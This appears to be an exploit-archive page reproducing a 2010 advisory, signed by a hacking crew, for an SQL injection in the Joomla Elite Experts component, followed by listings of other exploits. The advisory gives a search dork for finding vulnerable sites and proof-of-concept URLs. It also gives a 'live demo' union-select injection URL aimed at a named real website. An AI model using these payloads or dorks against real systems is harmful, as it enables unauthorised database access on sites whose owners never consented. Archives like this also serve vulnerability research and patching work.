Menu

Search for hundreds of thousands of exploits

"Joomla! Component Elite Experts - SQL Injection"

Author

Exploit author

**RoAd_KiLlEr**

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2010-09-24

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
[+]Title           Joomla  Component  (com_elite_experts)   SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact         RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on       Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Vendor: http://www.joomla.org
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
The 'com_elite_experts' component is a module for the Joomla! and Mambo content managers.

=========================================

[+] Dork: inurl:"option=com_elite_experts"

==========================================

[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[P0C]:  http://127.0.0.1/path/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=[SQL Injection] 

[Dem0]:  http://127.0.0.1/path/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=[SQL Injection] 

[LiVe DeM0]:

http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--


[Infos]:  In  Other webpages the nomber of columns changes,but all of them are vulnerable to the "id" parameter... :P  Good Luck

===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   Says: Hate me , but all you motherf******* can't brake Me, So Hate Me.... For All Haters
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE  | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r  | indoushka | Sid3^effects| L0rd CruSad3r |SONIC | All Inj3ct0r 31337 Members | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-19 "Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free" remote windows_x86 0xeb-bp
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
Release Date Title Type Platform Author
2011-03-28 "Honey Soft Web Solution - Multiple Vulnerabilities" webapps php **RoAd_KiLlEr**
2010-09-27 "Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting" webapps windows_x86 **RoAd_KiLlEr**
2010-09-27 "Car Portal 2.0 - Blind SQL Injection" webapps php **RoAd_KiLlEr**
2010-09-24 "Joomla! Component Elite Experts - SQL Injection" webapps windows_x86 **RoAd_KiLlEr**
2010-09-14 "Joomla! Component JGen 0.9.33 - SQL Injection" webapps php **RoAd_KiLlEr**
2010-07-26 "Freeway CMS 1.4.3.210 - SQL Injection" webapps php **RoAd_KiLlEr**
2010-07-06 "PreProject Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass" webapps php **RoAd_KiLlEr** 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected